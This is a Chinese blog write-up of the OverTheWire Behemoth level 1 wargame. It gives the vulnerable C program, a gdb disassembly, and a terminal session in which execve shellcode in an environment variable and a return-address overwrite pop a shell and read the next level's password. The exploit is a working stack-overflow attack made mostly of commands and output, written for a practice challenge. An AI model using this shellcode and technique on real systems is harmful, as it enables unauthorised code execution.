behemoth - 01

最新推荐文章于 2019-06-20 16:33:33 发布
最新推荐文章于 2019-06-20 16:33:33 发布
阅读量510 收藏
点赞数
分类专栏: wargames wargames-writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuimuyq/article/details/50724578
版权 
#include <stdio.h>

int main(int argc, char *argv[])
{
	char buf[64];

	printf("Password: ");

	gets(buf);

	puts("Authentication failure.\nSorry.");

	return 0;
}



root@today:~# ssh behemoth1@178.79.134.250

behemoth1@178.79.134.250's password: aesebootiv

behemoth1@melinda:~$ cd /tmp/shui1

behemoth1@melinda:/tmp/shui1$ ls
env  env.c  sleep

behemoth1@melinda:/tmp/shui1$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')

behemoth1@melinda:/tmp/shui1$ ./env EGG /behemoth/behemoth1
0xffffd89a

behemoth1@melinda:/tmp/shui1$ (python -c 'print "U"*79 + "\x9a\xd8\xff\xff"'; cat) | /behemoth/behemoth1
Password: Authentication failure.
Sorry.
whoami
behemoth2
cat /etc/behemoth_pass/behemoth2
eimahquuof


   ┌─────────────────────────────────────────────────────────────────────────────────┐
   │0x804845d <main>                push   %ebp                                      │
   │0x804845e <main+1>              mov    %esp,%ebp                                 │
   │0x8048460 <main+3>              and    $0xfffffff0,%esp                          │
   │0x8048463 <main+6>              sub    $0x60,%esp                                │
   │0x8048466 <main+9>              movl   $0x8048530,(%esp)                         │
   │0x804846d <main+16>             call   0x8048310 <printf@plt>                    │
   │0x8048472 <main+21>             lea    0x1d(%esp),%eax                           │
   │0x8048476 <main+25>             mov    %eax,(%esp)                               │
   │0x8048479 <main+28>             call   0x8048320 <gets@plt>                      │
   │0x804847e <main+33>             movl   $0x804853c,(%esp)                         │
   │0x8048485 <main+40>             call   0x8048330 <puts@plt>                      │
   │0x804848a <main+45>             mov    $0x0,%eax                                 │
   │0x804848f <main+50>             leave                                            │
   │0x8048490 <main+51>             ret                                              │
   └─────────────────────────────────────────────────────────────────────────────────┘


shuimuyq
关注
专栏目录
OverTheWire:Bandit通关WriteUp(2019.01.17完)
cynthrial的博客
12-25 1万+
OverTheWire:Bandit通关全攻略WriteUp背景通关过程Level0Level0-Level1Level1-Level2Level2-Level3Level 3 → Level 4Level 4 → Level 5Level 5 → Level 6功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内...
170903 WarGames-Behemoth(1)
whklhhhh的博客
09-05 318
1625-5 王子昂 总结《2017年9月3日》 【连续第335天总结】 A. WarGames-Behemoth B.Level 1int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[3]; // [sp+1Dh] [bp-43h]@1 printf("Password: ");
wargame behemoth writeup
weixin_34101784的博客
03-08 148
litao3rd · 2015/04/28 10:34又一期的wargame来了,这一期的wargame主要侧重于逆向,基本上在gdb下把程序的思路弄清楚了,再利用一些简单的渗透溢出技巧,就可以成功了。 Let's go!依然是老方法,在游戏behemoth首页可以找到登陆的服务器的账号和密码。ssh登陆上去,开始我们的wargame之旅。level 0登陆服务器,在游戏文件夹/behemoth下...
behemoth - 06
shuimuyq的专栏
02-23 434
/* behemoth6.c */ #include #include #include #include int main(int argc, char *argv[]) { FILE *fp; char *buf; fp = popen("/behemoth/behemoth6_reader", "r"); if (fp == NULL) { puts("Fail
behemoth - 05
shuimuyq的专栏
02-23 365
#include #include #include #include #include #include int main(int argc, char *argv[]) { struct sockaddr_in toaddr; /* 0x3c */ int sendstat; /* 0x38 */ int sock; /* 0x34 */ struct hostent
170907 WarGames-Behemoth(5-6)
whklhhhh的博客
09-07 291
1625-5 王子昂 总结《2017年9月7日》 【连续第339天总结】 A. WarGames-Behemoth B.Level 5int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { __int32 v3; // ST24_4@4 uint16_t v4; // ax@10
10种顶级javascript框架比较-The Top 10 Javascript MVC Frameworks
weixin_33966365的博客
06-20 328
转载于:http://codebrief.com/2012/01/the-top-10-javascript-mvc-frameworks-reviewed/ Gordon L. Hempton是西雅图的一位黑客和设计师,他花费了几个月的时间研究和比较了12种流行的JavaScript MVC框架,并在博客中总结了每种框架的优缺点,最终的结果是,Ember.js胜出。 Framew...
[学习笔记]overthewire bandit 通关秘籍
04-19 1173
1、第一关 使用putty等工具连入linux即可,注意port等设置。 ls 列目录内文件; cat readme,显示文件内容,即可看到密码。 2、第二关 如何查看文件名为-的文件? cat ./- 3、第三关 如何查看文件名包含空格的文件? cat "spaces in this filename" 4、第四关,如何查看隐藏文件? ls -a或者ll cat...
behemoth-language-id-1.0.jar
03-15
官方版本,亲测可用
behemoth-uima-1.0.jar
03-15
官方版本,亲测可用
behemoth-tika-1.0.jar
03-15
官方版本,亲测可用
behemoth-solr-1.0.jar
03-15
官方版本,亲测可用
behemoth-mahout-1.0.jar
03-15
官方版本,亲测可用
utumno - 0
shuimuyq的专栏
04-07 1345
因为utumno0不可读, 开始以为用strace可以获取一些信息 最后只是调用write,并没什么用(从这里可以知道库函数puts最后是调用write来实现的) 最后利用xocopy把可执行代码dump出来 gcc xocopy.c -o xocopy -m32 ./xocopy /utumno/utumno0 ./xocopy -a 0x08049000 /utumno/utumno
utumno - 6
shuimuyq的专栏
04-13 1247
root@today:~/Desktop/misc/utumno/utumno6# ssh utumno6@178.79.134.250 utumno6@178.79.134.250's password: eiluquieth utumno6@melinda:~$ mkdir /tmp/utu6 utumno6@melinda:~$ cd /tmp/utu6 utumno6@melind
utumno - 7
shuimuyq的专栏
04-13 776
root@today:~/Desktop/misc/utumno/utumno6# ssh utumno7@178.79.134.250 utumno7@178.79.134.250's password: totiquegae utumno7@melinda:~$ mkdir /tmp/utu7 utumno7@melinda:~$ cd /tmp/utu7 utumno7@melind
utumno - 4
shuimuyq的专栏
04-13 674
root@today:~/Desktop/misc/utumno/utumno4# ssh utumno4@178.79.134.250 utumno4@melinda:~$ cd /tmp/utu4 utumno4@melinda:/tmp/utu4$ gdb -tui /utumno/utumno4 (gdb) layout asm (gdb) b *main+108 Breakpoint
The largest animal ever to have lived on Earth is the dinosaur Argentinesaurus, a hulking 70-ton的英文全文
最新发布
04-03
The largest animal ever to have lived on Earth is the dinosaur Argentinosaurus, a hulking 70-ton behemoth that roamed the Earth during the Late Cretaceous period, approximately 90 million years ago....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值